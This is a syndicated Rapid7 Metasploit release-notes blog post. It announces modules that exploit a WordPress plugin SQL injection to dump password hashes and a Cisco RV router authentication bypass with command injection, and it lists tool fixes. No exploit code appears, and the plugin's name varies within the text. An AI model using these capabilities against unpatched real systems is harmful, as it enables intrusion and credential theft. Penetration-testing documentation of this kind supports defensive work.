Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/02/04/metasploit-wrap-up-147/

WordPress Exploitation Returns

What’s life without a little WordPress exploitation? Courtesy of Hacker5preme (aka Ron Jost) and h00die, we now have an exploit for CVE-2021-24862, a bug in the RestorationMagic WordPress plugin prior to 5.0.1.6 whereby user input was not properly escaped in the rm_chronos_ajax action prior to it being used in an SQL statement.

By utilizing this module, authenticated attackers can grab the usernames and password hashes of users on the affected WordPress site, which could then be cracked using hashcat or John The Ripper to get the plaintext password.

Since users are prone to reusing their passwords across sites this module could potentially allow attackers who successfully cracked a users password to successfully log into other sites, which is a practice commonly known as credential stuffing. As a reminder, it is recommended to use unique passwords for each site to mitigate against credential stuffing attacks.

Whilst the risk of this is somewhat mitigated by the fact that valid login credentials are required, keep in mind that RestorationMagic is designed to be a user registration form plugin and is designed to help register users onto your WordPress site, so in most cases all an attacker would just have to do is just register and gain a user account on the target site to exploit this bug.

Unauthenticated Cisco Small Business RV Series Command Injection – Cisco Spiciness Returns

Its always good when we get a Cisco module, as these devices are used all over the place. Takeshi Shiomitsu and Rapid7’s Jacob Baines certainly delivered on this front with a module for exploiting CVE-2021-1473, which combines an authentication bypass with a command injection vulnerability to execute code as the www-data user on vulnerable Cisco RV Series VPNs and Routers running firmware versions 1.0.03.20 and below.

Because of the sensitivity of data that Cisco routers process as well as the level of access they often have, Cisco routers have often been a prime target for exploitation in the past. It is likely that in the wild exploitation of this vulnerability will occur in the near future, so if you haven’t patched this vulnerability already, it is highly encouraged to do so soon.

New module content (3)

• WordPress RegistrationMagic task_ids Authenticated SQLi by Hacker5preme (Ron Jost) and h00die, which exploits CVE-2021-24862 – This adds an exploit for CVE-2021-24862 which is an authenticated SQL injection vulnerability within the RegistrationMagic WordPress plugin.
• Cisco Small Business RV Series Authentication Bypass and Command Injection by Takeshi Shiomitsu and jbaines-r7, which exploits CVE-2021-1473 – This adds an exploit for various Cisco RV series VPNs / Routers for firmware versions 1.0.03.20 and below. The module exploits both an auth bypass vulnerability and command injection vulnerability to achieve unauthenticated code execution as the www-data user against vulnerable devices.
• Nops: Add cmd/generic by bcoles – A new NOP module, modules/nop/cmd/generic, has been added which supports adding NOPs to command line payloads using spaces for NOP characters.

Enhancements and features

• #15994 from timwr – This updates Metasploit’s RPC functionality to support reading the result of external commands which have been executed in a console.
• #16014 from sjanusz-r7 – This adds human readable long-form option names to various commands such as save/connect/search and more.
• #16112 from zeroSteiner – This updates the PHP Meterpreter’s delete dir functionality to recursively delete directories, and adds validation to the getsystem command on Windows Meterpreter.
• #16113 from bcoles – A new NOP module, modules/nop/cmd/generic, has been added which supports adding NOPs to command line payloads using spaces for NOP characters.
• #16132 from red0xff – Enhancement to the MySQL injection library’s blind injection techniques now avoid usage of < and > characters to improve compatibility.

Bugs fixed

• #16025 from 3V3RYONE – This fixes an issue with msfdb init on windows when opting not to initialize web services.
• #16066 from sjanusz-r7 – This fixes a bug were Meterpreter scripts did not correctly receive arguments as part of the sessions command. Note that Meterpreter scripts are deprecated and have been replaced with Post modules.
• #16109 from bcoles – This fixes a crash in post/windows/gather/enum_domains when no domains are found.
• #16114 from bcoles – A bug existed in PayloadGenerator::prepend_nops whereby if no Nops modules existed for the target payload architecture, the payload would be vaporized and replaced with an array of Nop modules as a string. This was fixed. Now if no Nop modules exist for the target payload architecture, the raw shellcode is returned unmodified.
• #16119 from mrshu – This change fixes an incorrect user-agent in modules/auxiliary/dos/http/slowloris.py.
• #16123 from AtmegaBuzz – This fixes the missing full disclosure reference URL in the exploit/linux/http/cisco_ucs_rce module.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.27…6.1.28
• Full diff 6.1.27…6.1.28

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).